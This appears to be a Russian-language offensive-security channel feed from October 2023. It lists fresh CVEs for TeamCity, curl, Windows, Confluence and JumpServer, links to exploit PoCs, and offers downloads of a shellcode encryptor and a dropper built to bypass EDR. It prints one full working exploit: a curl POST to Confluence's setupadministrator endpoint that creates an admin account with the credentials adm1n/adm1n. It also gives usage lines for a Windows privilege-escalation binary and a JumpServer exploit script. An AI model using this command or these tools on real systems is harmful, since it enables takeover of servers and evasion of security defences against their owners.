CVE-2023-42793
Authentication Bypass in JetBrains TeamCity CI/CD

Спасибо всем кто поучаствовал. Отдельное спасибо юристу и правоведу

#ran #redteam #malware

Свежий выпуск Inception 7

Supernova
Real fucking shellcode encryptor (бгг)
download

#shellcode #enc

Следим за трендами

* exim RCE
* Linux glibc LPE
* curl RCE
* WS_FTPd
* admin/admin

Abusing Active Directory Certificate Services
Part One (5 october 2023)

#AD

From C, with inline assembly, to shellcode
read

#C #shell

VULN in CURL
get CVE-2023-38545 - поиграться (сегодня patch)

#curl

Update:
How I made a heap overflow in curl

#curl #libcurl #ssrf

CVE-2023-36802
windows Local Privilege Escalation
Usage:
Windows_MSKSSRV_LPE_CVE-2023-6802.exe <pid>
где pid — это идентификатор процесса (в десятичном формате), который требуется повысить до SYSTEM
POC

#win #lpe

Ох твою мать а, не было печали...)))))))))))))))))
Короче, план такой
Надеюсь консультанты из Xpanamas ciscoTalos

CVE-2023-22515
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action

login - adm1n/adm1n

Почитать как это работает

Cordyceps - род спорыньёвых грибов, пиреномицеты, паразитирующие на определённых видах насекомых.
Домен: Эукариоты
Царство: Грибы
*
А кроме того это самоинъекционный дроппер на C++, предназначенный для обхода EDR.
download

#bypass #edr

Внутри JS ?))

ДатаСексуалы на месте ?
Вся туса в сборе: 0day,rce,dos,eop,xss и дюша метЁлкин
Переходите сразу к таблице
Только вот с CVE-2023-36778 НЕ угадали

берут на вооружение )))
ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers

#hideIP #hex #16bit

CVE-2023-42820
Дырка в JumpServer (opensource хост-бастион)

Usage:
python CVE-2023-42820.py -t http://IP:Port -e email -u username